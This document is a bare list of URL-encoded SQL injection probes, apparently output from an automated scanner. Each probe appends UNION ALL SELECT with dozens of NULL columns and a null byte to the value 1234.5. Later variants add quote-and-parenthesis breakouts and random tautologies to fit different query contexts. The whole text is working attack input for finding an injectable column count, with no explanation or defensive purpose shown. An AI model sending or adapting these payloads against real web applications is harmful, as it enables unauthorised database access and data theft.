1234.5%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00 1234.5%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00 1234.5%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00 1234.5%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00 1234.5%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00 1234.5%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00 1234.5%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00 1234.5%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%27dKsp%27%3D%27dKsp 1234.5%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%27IFgw%27%3D%27IFgw 1234.5%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%27nTrg%27%3D%27nTrg 1234.5%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%27YKZP%27%3D%27YKZP 1234.5%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%27tyyZ%27%3D%27tyyZ 1234.5%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%27iaeQ%27%3D%27iaeQ 1234.5%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%27vCNs%27%3D%27vCNs 1234.5%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%27aaJi%27%3D%27aaJi 1234.5%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%27nbQk%27%3D%27nbQk 1234.5%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%27oHaX%27%3D%27oHaX 1234.5%27%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%28%27MOxi%27%3D%27MOxi 1234.5%27%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%28%27SKLc%27%3D%27SKLc 1234.5%27%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%28%27UUIG%27%3D%27UUIG 1234.5%27%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%28%27eIfm%27%3D%27eIfm 1234.5%27%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%28%27cWOI%27%3D%27cWOI 1234.5%27%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%28%27dbut%27%3D%27dbut 1234.5%27%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%28%27AwuL%27%3D%27AwuL 1234.5%27%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%28%27VGbh%27%3D%27VGbh 1234.5%27%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%28%27nEuD%27%3D%27nEuD 1234.5%27%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%28%27YLfk%27%3D%27YLfk 1234.5%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%28%28%27prDx%27%3D%27prDx 1234.5%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%28%28%27cTGf%27%3D%27cTGf 1234.5%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%28%28%27CWNF%27%3D%27CWNF 1234.5%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%28%28%27PkIH%27%3D%27PkIH 1234.5%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%28%28%27XefJ%27%3D%27XefJ 1234.5%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%28%28%27iHQz%27%3D%27iHQz 1234.5%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%28%28%27Gypa%27%3D%27Gypa 1234.5%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%28%28%27Epgu%27%3D%27Epgu 1234.5%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%28%28%27dMaR%27%3D%27dMaR 